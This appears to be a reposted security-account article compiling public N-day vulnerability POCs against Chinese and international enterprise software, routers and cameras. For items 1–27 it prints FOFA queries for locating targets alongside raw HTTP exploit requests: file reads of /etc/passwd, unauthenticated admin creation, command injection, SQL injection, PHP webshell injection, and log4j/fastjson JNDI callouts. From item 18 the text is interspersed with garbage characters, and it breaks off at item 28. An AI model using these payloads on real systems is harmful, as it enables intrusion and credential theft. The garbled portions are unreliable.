Public Internet Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attacks. We hope this article is of some help to defenders, who can use its contents to check their exposure.

Sources: This article covers 203 POCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the Internet and were compiled and published by the 网络安全新视界 team.

Patches: All of the vulnerabilities are publicly disclosed; for patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few POCs that are too long are uniformly replaced with the word PAYLOAD; search for the full POC yourself if you need it.

Legal: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement
To simplify the process and make browsing easier, there is no "reply to get the full list" gate. This article is the most complete version available; when using it, simply use F12 to search for keywords.
Bookmark this article if you find it useful. You can also follow this public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. 深信服 NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. 斐讯 Phicomm router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆HFOffice医微云 SQL injection
17. 大华 DSS itcBulletin SQL injection
18. 大华 DSS digital surveillance system user_edit.action information disclosure
19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. 大华ICC intelligent IoT integrated management platform arbitrary file read
21. 大华ICC intelligent IoT integrated management platform random remote code execution
22. 大华ICC intelligent IoT integrated management platform log4j remote code execution
23. 大华ICC intelligent IoT integrated management platform fastjson remote code execution
24. 用友NC 6.5 accept.jsp arbitrary file upload
25. 用友NC registerServlet JNDI remote code execution
26. 用友NC linkVoucher SQL injection
27. 用友 NC showcontent SQL injection
28. 用友NC grouptemplet arbitrary file upload
29. 用友NC down/bill SQL injection
30. 用友NC importPml SQL injection
31. 用友NC runStateServlet SQL injection
32. 用友NC complainbilldetail SQL injection
33. 用友NC downTax/download SQL injection
34. 用友NC warningDetailInfo interface SQL injection
35. 用友NC-Cloud importhttpscer arbitrary file upload
36. 用友NC-Cloud soapFormat XXE
37. 用友NC-Cloud IUpdateService XXE
38. 用友U8 Cloud smartweb2.RPC.d XXE
39. 用友U8 Cloud RegisterServlet SQL injection
40. 用友U8-Cloud XChangeServlet XXE
41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
42. 用友GRP-U8 SmartUpload01 file upload
43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
44. 用友GRP-U8 bx_dj_check.jsp SQL injection
45. 用友GRP-U8 ufgovbank XXE
46. 用友GRP-U8 sqcxIndex.jsp SQL injection
47. 用友GRP A++Cloud government finance cloud arbitrary file read
48. 用友U8 CRM swfupload arbitrary file upload
49. 用友U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. 泛微E-Office json_common.php SQL injection
53. 迪普 DPTech VPN Service arbitrary file upload
54. 畅捷通T+ getstorewarehousebystore remote code execution
55. 畅捷通T+ getdecallusers information disclosure
56. 畅捷通T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. 畅捷通T+ keyEdit.aspx SQL injection
58. 畅捷通T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云一脸通 smart management platform 1.0.55.0.0.1 permission bypass
66. 万户ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. 万户ezOFFICE wpsservlet arbitrary file upload
68. 万户ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户ezEIP success command execution
71. 邦永PM2 project management system Global_UserLogin.aspx SQL injection
72. 致远OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. 致远M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普掌上校园 service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
82. 思福迪LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. 致远互联FE collaborative office platform editflow_manager SQL injection
90. 海康威视 IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. 海康威视 integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. 海康威视 operations management center session command execution
93. 奇安信网神SecGate3600 firewall app_av_import_save arbitrary file upload
94. 奇安信网神SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast盈可视 HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. 广联达Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康NS-ASG application security gateway index.php SQL injection
135. 网康NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical picture archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 fully intelligent parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical browsing system deleteStudy SQL injection
190. 短视频矩阵 marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. 山石网科云鉴 security management system setsystemtimeaction command execution
194. 飞企互联-FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS ocean video management system dmku SQL injection
201. 方正 full-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC List

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"

Set password to the MD5 of your chosen password
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. 深信服 NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. 斐讯 Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default account admin, then perform the following operation
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step 1 login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. 稻壳CMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=PAYLOAD HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. 蓝凌EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. 蓝凌EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

POST request: executes the function and applies base64 encoding
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Send the following request to the target to execute the id command; the value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= in the request header is the base64-encoded command
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. 红帆iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The leaked content includes usernames and passwords
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. 红帆HFOffice医微云 SQL injection
FOFA: title="HFOffice"
The POC calls a function that computes the MD5 of 1234
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>

18. 大华 DSS 数字监控系统 user_edit.action 信息泄露* B& b0 F' }( o! R
FOFA:app="dahua-DSS"
+ |( B% b0 F: L+ B; \1 {GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
- z; I3 Q, A q, P! pHost: your-ip
% a0 ]4 D, {% s% L) UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Y& l6 U+ R, Q1 E/ i5 uAccept-Encoding: gzip, deflate3 U5 v. l: D3 t! I9 v, C0 b( k
Accept: */*
( A' Z+ G# g7 T% Q! i" q! AConnection: keep-alive
( F: W2 t; ~# I4 |; |$ m M, E+ \3 L& z
, W) L% b0 |$ y4 o' f+ W% _/ `
, Q9 a1 n8 b( R$ u# W$ k0 w19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
+ M' m$ C: ~8 v" NFOFA:app="dahua-DSS"% y' I' e6 g3 |' J( @% w# @
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
2 {3 K/ Q$ H/ o; S3 `4 k% BHost:
, ~. b' p0 T( M+ j, W; jUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36. ?& @. z X: T- e9 N0 n! }* |
Accept-Encoding: gzip, deflate$ q- x: {0 L- W
Accept: */*
! c$ F' U* l! G- s% F, X. @4 ZConnection: keep-alive
% I9 [1 \8 U- w0 o" y9 r$ M5 ?$ v& `6 `. z0 B( D" O: M& ~ j/ o% L
2 k- ~+ l" T/ b, F0 f20. 大华ICC智能物联综合管理平台任意文件读取
: N. O' O) [4 s* Z7 a7 O) u: t4 NFOFA:body="*客户端会小于800*"
6 d5 D* F, T" O- \GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
s" q. ^. w6 ]3 _0 @. ?Host: x.x.x.x
4 \1 T: ^% Q$ N6 X$ Q% }User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- h2 h! O% }5 P3 R' u/ W. |3 q( `
Connection: close
, Q3 k g0 b4 k# y# G+ l P2 mAccept: */*
: l |% L8 y- b) U+ N( U- ^Accept-Language: en* j: h1 p4 \! e
Accept-Encoding: gzip, E" h3 n3 q9 j
+ u- X Z; H9 |& e6 H: j L& X7 B
21. 大华ICC智能物联综合管理平台random远程代码执行# V' J3 A V6 T! e. m1 u
FOFA:icon_hash="-1935899595"
6 a( K7 b8 F0 e6 V3 _% J1 e5 EPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ U# C$ t+ ~1 Y6 ?# r, G( n0 J
Host: x.x.x.x
g: R+ o1 z1 r r8 {5 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ H% L0 r* ^, T! nContent-Length: 161! p5 J Q6 S% Q
Accept-Encoding: gzip
P0 S* y* Z- P6 `8 w$ PConnection: close
3 ~# C3 W, `! J6 @% Q7 S; AContent-Type: application/json;charset=utf-8
7 {# g+ a: @* v2 _; y& m( q" z: x. \: j: h5 h& S
{
. [( `( g; }& b"a":{0 p& b, U1 E) K5 a# @, ~' o
"@type":"com.alibaba.fastjson.JSONObject"," C; `6 ]( f/ {. I7 w4 U
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
# A* k* i9 X8 [1 ]) P$ M( M1 \- F }""
8 j9 K4 g# x3 H+ p+ M} e C' ?" Z, f1 b" Q- l
7 J& v* y( ]- H5 \9 y' B, P
$ n# k) ?# `9 _* c, E22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 [/ U! h7 O' d6 s7 ?% P) i5 u
FOFA:icon_hash="-1935899595"
/ o' I" N$ y* |- bPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1, H) n. b( |3 @) B7 P% {
Host: your-ip" {% U6 @1 a x9 b* n" o- }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; B; u8 E% O" u& K# v7 U* C4 `2 w
Content-Type: application/json;charset=utf-8% D* M% u) R! W9 [+ {. W
( {4 L9 C+ F9 g+ N: e{
5 O/ |# V3 l, j' V' `"loginName":"${jndi:ldap://dnslog}"& }5 G I7 Z& `2 n/ g
}
& B3 q; V) o+ Y e/ Y" L2 i: J `$ Y( V7 g3 V* i& l
2 X6 |! e. q+ K5 X1 O6 R& v7 W" P6 o! C& P* t5 y* W$ b
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
, X3 x0 }& @* T+ ^/ E/ tFOFA:icon_hash="-1935899595"
% w9 |% f+ ^9 w1 a. QPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. @4 ~2 U; t9 \ UHost: your-ip
: [: p- T5 F- O1 N, b* T+ }# JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( y3 L' G; x5 R" B% v, a; E8 S
Content-Type: application/json;charset=utf-8
) |: B3 ~/ {! m/ f* Y( IAccept-Encoding: gzip6 `* h6 w5 g" F' P) F- S0 C4 b
Connection: close% t. H( B; I% V; o4 D- d
7 M' i# A5 h. F$ K! o6 z! ]/ a" B{+ x( V5 g2 j' \$ C2 ]
"a":{
1 F4 ~' [- e# q7 K; E "@type":"com.alibaba.fastjson.JSONObject",
2 a4 k# L6 ]2 _8 X' [% D8 } {"@type":"java.net.URL","val":"http://DNSLOG"}
3 l# a6 K! k' H }""
) h; q/ ~- x r3 K}! t% I4 c- ~8 T0 H% ^1 o
8 r6 m! f3 n+ @& r, r! ?5 d
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA:icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
